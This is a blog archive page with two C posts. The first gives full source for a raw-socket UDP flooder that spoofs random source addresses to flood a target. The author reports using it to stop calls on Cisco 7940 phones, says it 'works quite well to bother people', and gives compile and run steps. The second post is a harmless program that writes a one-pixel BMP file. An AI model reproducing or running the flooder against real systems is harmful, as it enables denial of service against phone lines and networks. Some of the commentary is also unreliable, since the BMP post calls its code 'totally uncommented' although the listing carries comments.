Posts tagged c
UDP Flooder in C
Yesterday we were still working on some attacks on our test bench, and we tried some exploits that we found on the internet against the phones. Most of them caused a DDOS on the phone, but they also blocked it:
this means that when people try to make a call … they find the phone frozen … So, together with a friend, I made some modifications to some C code that I had from a few years ago: a UDP flooder.
It sends UDP datagrams to random ports on a specific address with a random source address … and it only works on Linux.
The code helped us stop the connection between the 2 phones.
One phone tries to reach the other one … but the other one is too busy answering all the « pings », and it sends its replies
to random addresses that cannot answer.
We also discovered that once the connection between the 2 phones is established, the phone
is not affected.
Here is the code.
#include <stdio.h> // printf/fprintf
#include <stdlib.h>
#include <string.h>
#include <netinet/ip.h> // struct ip
#include <sys/socket.h> // socket()
#include <netinet/in.h> // struct sockadd
#define __FAVOR_BSD
#define _USE_BSD
#include <netinet/udp.h> // struct udp
#define PADDING_SIZE 1
#define N_LOOP 10
#define U_WAITING 100000
void udp(char *);
unsigned short int in_chksum (unsigned short int *, int);
unsigned long hasard(unsigned long, unsigned long);
/*
 * Test-bench driver.
 *
 * Seeds rand() from the current time, then runs N_LOOP iterations. Each
 * iteration calls udp() twice on a placeholder address and pauses
 * U_WAITING microseconds after each call, so one run emits 2 * N_LOOP
 * datagrams in total. A '-' and a '+' are printed as progress markers.
 */
main() {
srand(time(NULL));
int i;
for(i=0;i<N_LOOP;i++)
{
udp("xxx.xxx.xxx.xxx");
usleep(U_WAITING);
printf("-");
udp("xxx.xxx.xxx.xxx");
usleep(U_WAITING);
printf("+");
}
}
/*
 * Build one raw IPv4/UDP datagram addressed to `cible` (dotted-quad string)
 * and hand it to the kernel through a raw socket with IP_HDRINCL set.
 *
 * What the code writes into the buffer, which is what a capture filter or
 * detection rule on the receiving network can key on:
 *   - source address drawn at random from the upper half of the 32-bit range
 *   - random source and destination ports
 *   - TTL 255, a fixed IP id, UDP checksum field left at 0
 *   - PADDING_SIZE byte(s) of payload, the single byte 'G'
 * NOTE(review): with IP_HDRINCL the kernel may rewrite some IP header
 * fields before transmission; confirm the on-wire values against a capture.
 *
 * Because the source address is random, per-source blocking does not help
 * the receiver; anti-spoofing (ingress) filtering and rate limiting of
 * unsolicited UDP towards the phones are the relevant controls.
 *
 * A raw socket needs elevated privileges; the error message on socket()
 * failure hints at this ("root ?").
 */
void udp(char *cible) {
int sd;
sd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sd == -1) {
/* Only logs; execution continues with sd == -1. */
fprintf(stderr,"socket() error, root ?\n");
}
/* Random source address in [4294967295/2, 4294967295]. */
unsigned long ip_src = hasard(4294967295/2,4294967295);
unsigned long ip_dst = inet_addr(cible);
/* Random ports over the full 16-bit range; stored as produced, without htons(). */
unsigned short p_src = (unsigned short) hasard(0,65535);
unsigned short p_dst = (unsigned short) hasard(0,65535);
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = p_dst;
sin.sin_addr.s_addr = ip_dst; // dst
struct ip *ip;
struct udphdr *udp;
char *dgm, *data;
/* One contiguous buffer: IP header, UDP header, then the payload. */
int pksize = sizeof(struct ip) + sizeof(struct udphdr) + PADDING_SIZE;
/* The malloc() result is not checked before use. */
dgm = (char *) malloc(pksize);
ip = (struct ip *) dgm;
udp = (struct udphdr *) (dgm + sizeof(struct ip));
data = (char *) (dgm + sizeof(struct ip) + sizeof(struct udphdr));
memset(dgm, 0, pksize);
memcpy((char *) data, "G", PADDING_SIZE);
/* IP_HDRINCL: the caller supplies the IP header that follows. */
int un = 1;
if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, (char *)&un, sizeof(un)) == -1)
{
fprintf(stderr,"setsockopt()");
exit(-1);
}
// IP header
ip->ip_v = 4;
ip->ip_hl = 5;
ip->ip_tos = 0;
/* Set from sizeof(pksize), i.e. the size of an int, not from pksize itself. */
ip->ip_len = sizeof(pksize);
ip->ip_ttl = 255;
ip->ip_off = 0;
/* sizeof(45) is the size of an int, so the id is the same for every datagram. */
ip->ip_id = sizeof( 45 );
ip->ip_p = IPPROTO_UDP;
ip->ip_sum = 0; // to be filled in later
ip->ip_src.s_addr = ip_src;
ip->ip_dst.s_addr = ip_dst;
// UDP header
udp->uh_sport = p_src;
udp->uh_dport = p_dst;
udp->uh_ulen = htons(sizeof(struct udphdr ) + PADDING_SIZE);
/* UDP checksum field left at zero; in_chksum() is not called here. */
udp->uh_sum = 0;
// send
if (sendto(sd, dgm, pksize, 0, (struct sockaddr *) &sin,
sizeof(struct sockaddr)) == -1) {
fprintf(stderr,"oops, sendto() error\n");
}
// free the memory
free(dgm);
close(sd);
}
/*
 * 16-bit one's-complement style checksum over `len` bytes starting at `addr`.
 *
 * Adds the buffer up as 16-bit words, adds a trailing odd byte if there is
 * one, folds the carries and returns the bitwise complement of the result.
 *
 * NOTE(review): nothing in the visible listing calls this function, and the
 * prototype near the top of the file spells the types `unsigned short int`
 * while this definition uses `u_short`.
 */
u_short in_chksum (u_short *addr, int len) // taken from papasmurf.c
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/* Accumulate whole 16-bit words. */
while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}
/* Odd length: copy the last byte into the first byte of `answer` and add it. */
if (nleft == 1)
{
*(u_char *)(&answer) = *(u_char *)w;
sum += answer;
}
/* Fold step as written: (sum >> 16) is added to (sum + 0xffff). */
sum = (sum >> 16) + (sum + 0xffff);
sum += (sum >> 16);
/* Complement, truncated to 16 bits by the assignment. */
answer = ~sum;
return(answer);
}
/*
 * Return a pseudo-random value derived from rand(): min plus
 * rand() / RAND_MAX scaled by (max - min + 1).
 *
 * The scaling is done in single-precision float and the sum is then
 * converted to u_long, so the result depends on float rounding.
 * Uses the global rand() state; main() seeds it with srand(time(NULL)).
 */
unsigned long hasard(unsigned long min, unsigned long max){
return (u_long) (min + ((float) rand() / RAND_MAX * (max - min + 1)));
}
This works quite well to bother people without affecting the phone.
You can easily compile it with the following command:
gcc -o udp udp.c
and run it with
./udp
if everything is working you should see
+-+-+-
This appears while the program is running.
We tested it on 7940 phones from Cisco and it worked well … soon we will publish some new code.
Have fun.
Creating one Pixel in a BMP in C
This thing is totally USELESS! But I spent almost 3 days on it,
reading how BMPs are made and trying to understand every part of the BMP
header!
If you look closely, the pixel is there ====> above
I wanted a C sample that was easier than what I found on Wikipedia,
so I wrote my own code … it is just useless and makes only one red
pixel in a BMP file (this will probably evolve into something better later),
but right now there is a pixel.
So this is the code:
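#include <stdio.h>

/*
 * Write a 1x1, 24-bit uncompressed BMP holding one red pixel to "test.bmp"
 * in the current directory.
 *
 * Layout: 14-byte file header, 40-byte info header, then one pixel row.
 * BMP rows are padded to a multiple of 4 bytes, so the single 3-byte BGR
 * pixel is followed by one zero pad byte and the file is 54 + 4 = 58 bytes.
 *
 * Returns 0 on success and 1 if the file cannot be opened or fully written.
 */
int main(void){
    enum { FILE_HEADER_SIZE = 14, INFO_HEADER_SIZE = 40, ROW_SIZE = 4 };
    const int filesize = FILE_HEADER_SIZE + INFO_HEADER_SIZE + ROW_SIZE;
    FILE *f;
    /* 'B','M', file size (filled in below), reserved, offset to pixel data (54). */
    unsigned char bmpfileheader[FILE_HEADER_SIZE] = {'B','M', 0,0,0,0, 0,0,0,0, 54,0,0,0};
    /* Header size (40), width, height, planes (1), bits per pixel (24); rest zero. */
    unsigned char bmpinfoheader[INFO_HEADER_SIZE] = {40,0,0,0, 0,0,0,0, 0,0,0,0, 1,0, 24,0};
    /* One pixel in B,G,R order (red) plus the pad byte that completes the row. */
    const unsigned char bmpcontent[ROW_SIZE] = {0, 0, 255, 0};
    int ok;

    /* File size, little-endian. */
    bmpfileheader[2] = (unsigned char)(filesize);
    bmpfileheader[3] = (unsigned char)(filesize >> 8);
    bmpfileheader[4] = (unsigned char)(filesize >> 16);
    bmpfileheader[5] = (unsigned char)(filesize >> 24);

    /* Width and height are both 1. */
    bmpinfoheader[4] = (unsigned char)(1);
    bmpinfoheader[8] = (unsigned char)(1);

    f = fopen("test.bmp", "wb");
    if (f == NULL) {
        perror("test.bmp");
        return 1;
    }

    /* Write exactly the bytes each array holds; never read past the end of one. */
    ok = fwrite(bmpfileheader, 1, sizeof bmpfileheader, f) == sizeof bmpfileheader
      && fwrite(bmpinfoheader, 1, sizeof bmpinfoheader, f) == sizeof bmpinfoheader
      && fwrite(bmpcontent, 1, sizeof bmpcontent, f) == sizeof bmpcontent;

    /* fclose() flushes, so a failure here also means the file is incomplete. */
    if (fclose(f) != 0) {
        ok = 0;
    }

    if (!ok) {
        fprintf(stderr, "test.bmp: write failed\n");
        return 1;
    }
    return 0;
}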
Yes, this code is totally uncommented and will stay that way!
Why? Because I'm actually lazy, and if you want some more information on this … you can just contact me.
Have a nice programming night.